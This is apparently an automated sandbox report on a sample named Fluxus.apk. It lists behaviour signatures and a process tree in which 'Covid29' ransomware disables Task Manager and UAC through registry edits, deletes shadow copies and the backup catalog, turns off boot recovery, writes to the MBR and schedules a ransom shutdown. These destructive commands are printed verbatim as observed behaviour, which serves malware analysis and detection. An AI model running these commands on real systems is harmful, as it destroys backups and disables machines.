Analysis

  • max time kernel
    229s
  • max time network
    212s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-07-2024 23:32

General

  • Target

    Fluxus.apk

  • Size

    10.3MB

  • MD5

    4f51b9ea40b4fbd59c8c4e4aecdef7a2

  • SHA1

    72470cb505fdda9da46c3dea9eba97d6080831be

  • SHA256

    b899ce17c635faca85c46f3559317942479f7eaf5075f5482e93aad155660a4b

  • SHA512

    890e88f2337633eac81a807197838eddfb6241a705ecbddcf243579c6be85f56b991768bd33d8dbbd08420bd2ceba20a762e99b93d92dd6093ef8ebce5f9aa26

  • SSDEEP

    196608:RF22K6KY84nVTbGdrHX4yrJ1ftRe1gOzLQcLO:RF22KBY8GVTbGdrfrPfTK51LO

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 10 IoCs
  • UAC bypass 3 TTPs 10 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 15 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 24 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops desktop.ini file(s) 34 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies registry class 32 IoCs
  • Modifies registry key 1 TTPs 35 IoCs
  • Runs ping.exe 1 TTPs 10 IoCs
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Fluxus.apk
    1⤵
    • Modifies registry class
    PID:1716
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4236
    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Fluxus.apk"
      2⤵
      • Checks processor information in registry
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4628
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5032
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BE6FA78366A860A5FD133E8B04D317BA --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
          4⤵
            PID:2988
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=24088FDFA5E854911057C63ABCFB6F64 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=24088FDFA5E854911057C63ABCFB6F64 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
            4⤵
              PID:4176
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=67889FEBFF7BC821A902D1BFEBF25AA9 --mojo-platform-channel-handle=2348 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              4⤵
                PID:2356
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B0ECD8435A8CD1FDCE3E211FAF7002A0 --mojo-platform-channel-handle=1924 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                4⤵
                  PID:2724
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0F75E5A947D4D60191C9F78742B605C4 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  4⤵
                    PID:3648
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
              1⤵
              • Enumerates system info in registry
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:4696
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcfdfe46f8,0x7ffcfdfe4708,0x7ffcfdfe4718
                2⤵
                  PID:1444
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
                  2⤵
                    PID:3972
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1272
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2560 /prefetch:8
                    2⤵
                      PID:4536
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
                      2⤵
                        PID:4856
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                        2⤵
                          PID:3292
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
                          2⤵
                            PID:4348
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
                            2⤵
                              PID:1676
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:8
                              2⤵
                                PID:3504
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:220
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
                                2⤵
                                  PID:2596
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
                                  2⤵
                                    PID:4332
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
                                    2⤵
                                      PID:4072
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4284 /prefetch:1
                                      2⤵
                                        PID:4480
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
                                        2⤵
                                          PID:4348
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
                                          2⤵
                                            PID:3052
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
                                            2⤵
                                              PID:4552
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6048 /prefetch:8
                                              2⤵
                                                PID:2684
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6064 /prefetch:8
                                                2⤵
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:696
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
                                                2⤵
                                                  PID:3648
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6440 /prefetch:8
                                                  2⤵
                                                    PID:848
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
                                                    2⤵
                                                      PID:2556
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,8586464400101172778,3554269924221591733,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1812 /prefetch:8
                                                      2⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2328
                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                    1⤵
                                                      PID:1092
                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                      1⤵
                                                        PID:3496
                                                      • C:\Windows\System32\rundll32.exe
                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                        1⤵
                                                          PID:4128
                                                        • C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe
                                                          "C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"
                                                          1⤵
                                                            PID:216
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3733.tmp\TrojanRansomCovid29.bat" "
                                                              2⤵
                                                              • Checks computer location settings
                                                              • Modifies registry class
                                                              PID:4680
                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3733.tmp\fakeerror.vbs"
                                                                3⤵
                                                                  PID:4364
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping localhost -n 2
                                                                  3⤵
                                                                  • Runs ping.exe
                                                                  PID:244
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                  • Modifies registry key
                                                                  PID:3704
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                  • Modifies registry key
                                                                  PID:3496
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                  • Modifies registry key
                                                                  PID:4628
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                  • Modifies registry key
                                                                  PID:2140
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                  • Modifies registry key
                                                                  PID:1188
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                                  3⤵
                                                                  • UAC bypass
                                                                  • Modifies registry key
                                                                  PID:2404
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                  3⤵
                                                                  • UAC bypass
                                                                  • Modifies registry key
                                                                  PID:4824
                                                                • C:\Users\Admin\AppData\Local\Temp\3733.tmp\mbr.exe
                                                                  mbr.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Writes to the Master Boot Record (MBR)
                                                                  PID:4640
                                                                • C:\Users\Admin\AppData\Local\Temp\3733.tmp\Cov29Cry.exe
                                                                  Cov29Cry.exe
                                                                  3⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1524
                                                                  • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                    "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                    4⤵
                                                                    • Checks computer location settings
                                                                    • Drops startup file
                                                                    • Executes dropped EXE
                                                                    • Drops desktop.ini file(s)
                                                                    • Sets desktop wallpaper using registry
                                                                    • Modifies registry class
                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4332
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                                      5⤵
                                                                        PID:1624
                                                                        • C:\Windows\system32\vssadmin.exe
                                                                          vssadmin delete shadows /all /quiet
                                                                          6⤵
                                                                          • Interacts with shadow copies
                                                                          PID:3400
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic shadowcopy delete
                                                                          6⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3908
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                                        5⤵
                                                                          PID:1612
                                                                          • C:\Windows\system32\bcdedit.exe
                                                                            bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                            6⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:3584
                                                                          • C:\Windows\system32\bcdedit.exe
                                                                            bcdedit /set {default} recoveryenabled no
                                                                            6⤵
                                                                            • Modifies boot configuration data using bcdedit
                                                                            PID:3484
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                          5⤵
                                                                            PID:2700
                                                                            • C:\Windows\system32\wbadmin.exe
                                                                              wbadmin delete catalog -quiet
                                                                              6⤵
                                                                              • Deletes backup catalog
                                                                              PID:836
                                                                          • C:\Windows\system32\NOTEPAD.EXE
                                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                                                            5⤵
                                                                              PID:2624
                                                                        • C:\Windows\SysWOW64\shutdown.exe
                                                                          shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                                          3⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3760
                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                          ping localhost -n 9
                                                                          3⤵
                                                                          • Runs ping.exe
                                                                          PID:4036
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /f /im explorer.exe
                                                                          3⤵
